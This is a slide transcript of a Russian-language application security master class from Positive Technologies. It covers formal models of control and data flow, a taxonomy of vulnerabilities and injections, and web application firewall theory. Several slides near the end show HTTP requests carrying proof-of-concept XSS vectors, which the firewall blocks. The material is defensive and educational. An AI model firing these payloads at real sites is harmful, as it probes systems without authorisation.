Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Трущобы Application Security

Трущобы Application Security

Мастер-класс по безопасности приложений, прошедший во время PDUG-трека на PHDays VII (Владимир Кочетков, Денис Колегов, Positive Technologies).

Positive Development User Group

September 25, 2017
Tweet

More Decks by Positive Development User Group

Other Decks in Programming

Transcript

  1. Заголовок Денис Колегов – руководитель группы исследований технологий защиты Positive

    Technologies Доцент, к. т. н., доцент кафедры защиты информации и криптографии ТГУ https://twitter.com/dnkolegov [email protected] :~$ whoweare
  2. Заголовок • Теоретические основы Application Security • Эвристические методы защиты

    приложений • Формальные методы защиты на основе исходного кода • Объединяя подходы • Немного о чёрных ящиках Agenda
  3. Заголовок Предметная область, рассматривающая в качестве объекта защиты гипотетическую информационную

    систему (ИС): • включающую в себя конкретное приложение • объединяющую объекты окружения в единую сущность • замкнутую относительно информационных потоков приложения APPSEC (APPLICATION SECURITY) 1/2
  4. Заголовок APPSEC (APPLICATION SECURITY) 2/2 Входные данные Конфигурация окружения Исполняющая

    среда Выходные данные Приложение Окружение Граница доверия
  5. Заголовок • вне области влияния приложения его окружение защищено •

    логика предметной области приложения корректна ДОПУЩЕНИЯ APPSEC
  6. Заголовок Абстракция объекта в некотором контексте, обладающая следующими характеристиками: •

    свойство – значимый атрибут абстрагируемого сущностью объекта; • состояние– множество текущих значений всех свойств сущности; • инвариант– множество допустимых состояний сущности. Отношение – утверждение, определяющее взаимосвязь изменения состояний сущностей. СУЩНОСТЬ
  7. Заголовок Каскадное изменение состояний сущностей в соответствии с их отношениями

    вследствие однократного воздействия на одну из них ОПЕРАЦИЯ
  8. Заголовок Сущность: точки на карте города • свойство: координаты –

    пара значений «широта-долгота»; • инвариант: координаты принадлежат перекресткам города или строениям. Сущность: маршрут • свойство: путь - упорядоченное множество точек на карте города; • инвариант: путь непрерывен, проходит по улицам города в соответствии с ПДД; • отношение: оптимальность – длина пути минимальна для заданных начальной и конечной точек. Сущности: точка загрузки, точка доставки • свойство: точка на карте города; • инвариант: координаты принадлежат строениям. ПРИМЕР: ЛОГИСТИКА
  9. Заголовок В терминах предметной области логистики: построить оптимальный маршрут из

    точки загрузки, проходящий через все точки доставки по одному разу и возвращающийся в точку загрузки. ПРИМЕР: ЛОГИСТИКА
  10. Заголовок В терминах предметной области теории графов: Найти гамильтонов цикл

    минимального веса в полном (дополненном ребрами бесконечной длины) взвешенном графе. ПРИМЕР: ЛОГИСТИКА
  11. Заголовок ПРЕДМЕТНЫЕ ОБЛАСТИ ПРИЛОЖЕНИЙ Вторичные: • защищенность; • отказоустойчивость; •

    опыт взаимодействия, • производительность. Первичные (основные): ― интернет-торговля; ― онлайн-банкинг; ― бухучет; ― … (тысячи их). Каждое приложение реализует модели как основной предметной области, так и множество моделей вторичных предметных областей
  12. Заголовок Приложение можно представить в виде базовых блоков, между которыми

    передаётся управление в процессе выполнения приложения ПОТОКИ УПРАВЛЕНИЯ
  13. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 1/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  14. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 2/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  15. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 3/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  16. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 4/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  17. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 5/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  18. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 6/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  19. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 7/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  20. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 8/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  21. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 9/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  22. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 10/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  23. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 11/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  24. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 12/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  25. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 13/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  26. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 14/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  27. Заголовок ПОТОКИ УПРАВЛЕНИЯ (ПРИМЕР 15/15) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  28. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 1/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  29. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 2/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  30. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 3/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  31. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 4/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  32. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 5/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  33. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 6/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  34. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 7/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  35. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 8/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  36. Заголовок ПОТОКИ ДАННЫХ (ПРИМЕР 9/9) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  37. Заголовок Множество всех возможных значений потока данных в конкретной точке

    потока выполнения определяет его состояние СОСТОЯНИЕ ПОТОКА ДАННЫХ
  38. Заголовок СОСТОЯНИЕ ПОТОКА ДАННЫХ (ПРИМЕР) var name = Request.Params["name"]; var

    key1 = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); } str1 ∈ { Encoding.UTF8.GetString(data), "Wrong Key!" }
  39. Заголовок Множество состояний всех потоков данных в конкретной точке потока

    выполнения определяют состояние приложения СОСТОЯНИЕ ПРИЛОЖЕНИЯ
  40. Заголовок СОСТОЯНИЕ ПРИЛОЖЕНИЯ (ПРИМЕР) var name = Request.Params["name"]; var key1

    = Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); } str1 ∈ { Encoding.UTF8.GetString(data), "Wrong Key!" } name ∈ { Request.Params["name"] } key1 ∈ { Request.Params["key1"] } parm ∈ { Request.Params["parm"] } data ∈ { new char[0], Convert.FromBse64String(parm) }
  41. Заголовок Граф переходов между состояниями приложения определяет все возможные потоки

    вычисления и является искомой моделью процесса его выполнения ГРАФ ПОТОКОВ ВЫЧИСЛЕНИЯ
  42. Заголовок ГРАФ ПОТОКОВ ВЫЧИСЛЕНИЯ (ПРИМЕР 5/7) Request.Params["cond1"] != "true" &&

    Request.Params["cond2"] == "true" { parm' { Request.Params["cond1"] != "true" Request.Params["parm1"] } }
  43. Заголовок ГРАФ ПОТОКОВ ВЫЧИСЛЕНИЯ (ПРИМЕР 6/7) Request.Params["cond1"] != "true" &&

    Request.Params["cond2"] != "true" { parm' { Request.Params["cond1"] != "true" Request.Params["parm1"] } }
  44. Заголовок ГРАФ ПОТОКОВ ВЫЧИСЛЕНИЯ (ПРИМЕР 7/7) Request.Params["cond1"] != "true" {

    parm' { Request.Params["cond2"] == "true" Request.Params["parm2"] || Request.Params["cond2"] != "true" "<div>Harmless value</div>" } }
  45. Заголовок Приводимые далее термины и определения локальны и не претендуют

    на признание в качестве общеупотребительных. Тем не менее, они устраняют существующие разночтения и противоречия в традиционной терминологии, позволяя перейти от интуитивных формулировок к формальным. DISCLAIMER
  46. Заголовок Обусловленная недостатком возможность нарушения свойств состояния защищенности информационного потока:

    • конфиденциальности; • целостности; • доступности; • авторизованности; • аутентичности. УГРОЗА
  47. Заголовок То, что может сделать атакующий с потоками информации, называется

    угрозой (threat) То, когда и благодаря чему он может это сделать, называется уязвимостью (vulnerability), обусловленной недостатком (weakness) ИНЫМИ СЛОВАМИ
  48. Заголовок То, как он может это сделать, называется атакой (attack)

    То, с какой вероятностью у него это удастся и какие последствия может повлечь, называется риском (risk) ИНЫМИ СЛОВАМИ
  49. Заголовок То, что не позволяет атакующему провести атаку, обеспечивает защищенность

    (security) То, что минимизирует риск, обеспечивает безопасность (safety) ИНЫМИ СЛОВАМИ
  50. Заголовок Причины и следствия Недостаток (weakness) Угроза (threat) Уязвимость (vulnerability)

    Атака (attack) Риск (risk) Незащищенность (insecurity) Небезопасность (unsafety)
  51. Заголовок • Потоки операций являются и информационными потоками, и сущностями

    модели основной предметной области приложения • Потоки вычисления являются и информационными потоками, и сущностями предметной области защищённости приложения • Потоки данных окружения являются и информационными потоками, и сущностями модели окружения А ТЕПЕРЬ – ВСЁ ВМЕСТЕ
  52. Заголовок • Недостаток – неэффективная реализация моделей предметных областей приложения

    или окружения (контролей инвариантов их сущностей) Примеры контролей: • предварительная обработка потоков данных; • подтверждение аутентичности потоков операций; • проверка прав доступа к потокам данных; • обеспечение целостности потока операций; • … А ТЕПЕРЬ – ВСЁ ВМЕСТЕ
  53. Заголовок • Уязвимость приложения – состояние возможности нарушения конфиденциальности, целостности,

    доступности, аутентичности или авторизованности любого из потоков операций или вычисления приложения, а также потоков данных окружения • Состояние защищённости приложения возникает при невозможности эксплуатации в нём любой уязвимости А ТЕПЕРЬ – ВСЁ ВМЕСТЕ
  54. Заголовок • Вычислительный – уязвимости, описываемые в терминах модели процесса

    выполнения приложения • Логический – уязвимости, описываемые в терминах модели предметной области приложения • Экзогенный – уязвимости, описываемые в терминах модели окружения СУПЕРКЛАССЫ УЯЗВИМОСТЕЙ ПРИЛОЖЕНИЯ
  55. Заголовок Атаки на нарушение целостности потоков данных в результате их

    преобразования принято называть инъекциями Тип инъекции определяется грамматикой атакуемого потока данных (HTML, XML, SQL, XPath, XQuery, LDAP, LINQ, Path, …) ВЫЧИСЛИТЕЛЬНЫЙ КЛАСС: ИНЪЕКЦИИ
  56. Заголовок «Пусть C - граф потоков вычисления приложения. Пусть pvf(t)

    - достижимая вершина потока управления на C, являющаяся вызовом функции прямой или косвенной интерпретации текста t, соответствующего известной формальной грамматике G. Пусть e - поток аргумента входных данных на С. Пусть De - множество потоков данных на C, порождаемых от e и достижимых в точке вызова pvf(t), где t принадлежит De » МОДЕЛИРОВАНИЕ ИНЪЕКЦИЙ (1/3)
  57. Заголовок «Тогда приложение уязвимо к угрозе нарушения целостности потоков данных

    De в точке выполнения pvf(t), если среди них найдётся хотя бы одна пара таких значений, при которых, в результате их синтаксического разбора в соответствии с грамматикой G, получаются не изоморфные друг-другу деревья разбора» МОДЕЛИРОВАНИЕ ИНЪЕКЦИЙ (2/3)
  58. Заголовок МОДЕЛИРОВАНИЕ ИНЪЕКЦИЙ (3/3) The Essence of Command Injection Attacks

    in Web Applications (http://web.cs.ucdavis.edu/~su/publications/popl06.pdf)
  59. Заголовок Несогласованная работа с разделяемом ресурсом в многопоточном окружении приводит

    к гонкам за ресурс Окружение любого веб-приложения является многопоточным ВЫЧИСЛИТЕЛЬНЫЙ КЛАСС: ГОНКА ЗА РЕСУРС
  60. Заголовок Пусть P – сеть Петри, построенная по C, где

    переходами сети являются все промежуточные вершины C, позициями – его вершины, соответствующие операциям чтения или записи каждого ресурса окружения, а условиями перехода – условия достижимости соответствующих вершин C. Тогда, возможность появления более одной метки в любом состоянии графа маркировок P укажет на возможность реализации угрозы нарушения целостности или аутентичности потока вычисления. ВЫЧИСЛИТЕЛЬНЫЙ КЛАСС: ГОНКА ЗА РЕСУРС
  61. Заголовок • Направлены на реализацию угрозы (нарушение одного из свойств

    защищённости какого-либо потока вычисления, операций или данных окружения) • Могут являться как производными от предыдущих атак, так и первообразными для последующих. Например: • HTTP Response Splitting → Header Spoofing → Session Fixation Unvalidated Redirection Body spoofing → Content Spoofing Session Fixation Unvalidated Redirection Cross-Site Scripting … СВОЙСТВА АТАК
  62. Заголовок КЛАССИФИКАЦИЯ: ИНЪЕКЦИИ Признак Значение Предметная область Защищённость приложения Недостаток

    Неэффективная обработка потоков данных Информационный поток Поток данных, интерпретируемый окружением Угроза Нарушение целостности
  63. Заголовок КЛАССИФИКАЦИЯ: СПУФИНГ ПОТОКА ОПЕРАЦИЙ Признак Значение Предметная область Защищённость

    приложения Недостаток Неэффективное подтверждение аутентичности идентификатора потока операций Информационный поток Поток операций Угроза Нарушение аутентичности
  64. Заголовок КЛАССИФИКАЦИЯ: ПЕРЕПОЛНЕНИЕ БУФЕРА Признак Значение Предметная область Защищённость приложения

    Недостаток Неэффективный контроль записи производных потоков окружения в память Информационный поток Метаданные на стеке или в куче Угроза Нарушение целостности
  65. Заголовок КЛАССИФИКАЦИЯ: ОБХОД БИЗНЕС-ЛОГИКИ (ЧАСТНЫЙ СЛУЧАЙ) Признак Значение Предметная область

    Онлайн-торговля Недостаток Неэффективный контроль использования купонов на скидку Информационный поток Поток операций транзакции оплаты заказа Угроза Нарушение авторизованности
  66. Заголовок • Введение • Теория WAF • Методы защиты веб-приложений

    • Аутентификация веб-форм • Обнаружение инъекций • Встроенное распознавание • Виртуальный патчинг # План
  67. Заголовок • Учебно-демонстрационный межсетевой экран веб-приложений • Shockfish WAF •

    https://github.com/PositiveTechnologies/shockfish • Shockfish.js Client-side WAF • https://github.com/PositiveTechnologies/shockfish.js # Shockfish
  68. Заголовок Веб-приложение – клиент-серверное приложение, в котором клиентом является веб-браузер,

    сервером – веб-сервер, а протоколом взаимодействия между ними – веб-протокол Базовый состав • Веб-браузер • Веб-сервер / Сервер приложений • СУБД Определение
  69. Заголовок Огромное количество технологий и их реализаций Простота использования Доступность

    и распространенность Низкий порог входа • Для разработчиков • Для пентестеров / баг-хантеров • Для злоумышленников Особенности
  70. Заголовок Необходимо построить многоуровневую защиту В принципе невозможно устранить уязвимость

    в самом приложении • Legacy • Third-party Необходимый механизм защиты отсутствует или сложно реализуем • Защита от подбора паролей • Управление доступом • Защита от нежелательной автоматизации Необходимо немедленно устранить обнаруженную уязвимость до ее реального устранения в исходном коде А что если …?
  71. Заголовок В 1990-х годах активно используется принцип внешнего монитора безопасности

    Текущий подход: разрабатывать приложения защищенными, а не полагаться на внешние механизмы защиты Владимир Кочетков. Как разработать защищенное веб-приложение и не сойти при этом с ума Как правильно защищать приложения?
  72. Заголовок • An appliance, server plugin, or filter that applies

    a set of rules to an HTTP conversation • A security solution on the web application level which does not depend on the application itself • A security policy enforcement point positioned between a web application and the client end point. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components Что такое WAF? Web Application Firewall Evaluation Criteria
  73. Заголовок Развертывание: • Bridge • Router • Reverse proxy •

    Embedded • Out-of band (SPAN/RSPAN) Доставка: • Hardware integrated • Appliance • Claud • Software-only (software, web-server module, middleware, … ) • Software integrated (RASP) Классификация
  74. Заголовок Detective • Первичная валидация данных (методы, длина запроса, длина

    и число заголовков, …) • Обнаружение инъекций Mitigative - ослабление атак, от которых трудно защититься • Проверка на соответствие RFC • Аутентификация сообщений • Шифрование URL или скрытых полей • Маскирование данных • Блокирование IP-адреса или завершение сессии Предотвращение (prevention) – предотвращение использования обнаруженных уязвимостей • Виртуальный патчинг Механизмы защиты
  75. Заголовок • Валидация HTTP-запроса (метод, длина запросов, количество заголовков и

    т.д.) • Нормализация HTTP-запроса (HTTP Parameter Pollution & Contamination) • Обнаружение инъекций (SQLi, LDAP, XPath и т.д.) • Парсинг данных (XML, JSON, AMF и т.д.) • Проверка репутации IP Обработка запросов
  76. Заголовок Обнаружение утечек данных: • stack traces • debug information

    • application errors Обнаружение недостатков конфигураций: • отсутствие заголовков безопасности • небезопасная политика CSP • небезопасная конфигурация SSL/TLS Обработка ответов
  77. Заголовок Корреляция запросов и ответов HTTP: • обнаружение отражения параметров

    запроса в ответе (Reflected XSS, Open Redirect, HTTP Response Splitting) • обнаружение успешной эксплуатации уязвимости (например, наличие вектора Path Traversal в запросе и содержимого файла /etc/passwd в ответе) • User tracking – ассоциирование запросов и ответов с учетными записями пользователей защищаемого веб-приложения Обработка транзакций
  78. Заголовок • Credentials bruteforcing • Site scraping • Common vulnerability

    scanning • Account takeover • HTTP slow DoS attacks • L7 DDoS • Fraud Механизмы защиты реализуются на основе машинного обучения или счетчиков (например, max requests per second, max 404 errors per minute и т.д.) Поведенческий анализ
  79. Заголовок Теория • Теория формальных языков • LangSec Практика •

    Модель черного ящика • Множество технологий • Отсутствие стандартов • Развитие клиентских частей веб-приложений Источники ограничений
  80. Заголовок Входные данные – формальный язык WAF – универсальный распознаватель

    (recognizer) языков атак на веб- приложения Можно распознать эквивалентный или менее мощный язык Теория формальных языков Грамматика Распознаватель Типа 0 Машина Тьюринга Контекстно-зависимая Линейно-ограниченный автомат Недетерминированная контекстно-свободная Недетерминированный автомат с магазинной памятью Детерминированная контекстно-свободная Недетерминированный автомат с магазинной памятью Регулярная Конечный автомат LangSec: Language-theoretic security
  81. Заголовок Недостаточное (неэффективное) распознавание (insufficient recognition) • распознавание КС-языка с

    помощью регулярного выражения Различимость парсеров (parser differentials) • одни и те же входные данные распознаются парсерами по-разному Входные данные сложнее чем детерминированный контекстно- свободный язык Проблемы M. Patterson, S. Bratus, etc. The Seven Turrets of Babel: A Taxonomy of LangSec Errors and How to Expunge Them
  82. Заголовок Предположение. Язык инъекций КС-языка является как минимум КЗ-языком •

    ' or '1 ' = '1 Язык инъекций как минимум содержит цепочки (вектора) целевого языка, а значит является КС-языком • select * from foo where id = <injection> • (select ((1))) При этом префикс и постфикс являются контекстно-зависимыми Проблемы
  83. Заголовок Веб-приложение для WAF – это просто последовательность запросов и

    / или ответов Непонимание контекста Непонимание логики взаимодействия • Боты • Взлом аккаунта • Злоупотребления (abuse / misuse) Модель черного ящика
  84. Заголовок • HTTP (0.9, 1.0, 1.1, 1.2), WebSockets • SSL

    (2.0, 3.0), TLS (1.0, 1.1, 1.2, 1.3), HSTS, HPKP, OCSP • Load Balancers: F5 BIG-IP, Citrix NetScaler, … • Web-servers: Apache, Nginx, IIS, GWS, Jetty, … • Frameworks: ASP.NET, RoR, Django, Symfony, GWT, ExpressJS, … • SQL Databases: MySQL, MS SQL, PostgreSQL, Oracle, … • noSQL «Databases»: MongoDB, ElasticSearch, Redis, … • Browsers: Chrome, IE, Opera, Firefox, Safari, Yandex Browser, … • JavaScript libraries: jQuery, lodash, … • JavaScript Frameworks: Angular, React, Ext.js, Ember.js, … • HTML, CSS, XML, JSON Множество технологий
  85. Заголовок Минута из жизни WAF CATS /app?pageId=1 HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 403 Forbidden Server: WAF Content-Type: text/html; charset=utf-8 Content-Length: 9 Connection: close Forbidden
  86. Заголовок Минута из жизни WAF CATS /app?pageId=1 HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 403 Forbidden Server: WAF Content-Type: text/html; charset=utf-8 Content-Length: 9 Connection: close Forbidden
  87. Заголовок Минута из жизни WAF GET /app?pageId=<svg/onload=alert(1)> HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Acunetix-Product: WVS/7 (Acunetix Web Vulnerability Scanner – NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm HTTP/1.1 403 Forbidden Server: WAF Content-Type: text/html; charset=utf-8 Content-Length: 9 Connection: close Forbidden
  88. Заголовок Минута из жизни WAF GET /app?pageId=<svg/onload=alert(1)> HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Acunetix-Product: WVS/7 (Acunetix Web Vulnerability Scanner – NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm HTTP/1.1 403 Forbidden Server: WAF Content-Type: text/html; charset=utf-8 Content-Length: 9 Connection: close Forbidden
  89. Заголовок Минута из жизни WAF GET /app?pageId=<script>alert(1)</script> HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 403 Forbidden Server: WAF Content-Type: text/html; charset=utf-8 Content-Length: 9 Connection: close Forbidden
  90. Заголовок Минута из жизни WAF GET /app?pageId=<script>alert(1)</script> HTTP/1.1 Host: example.com

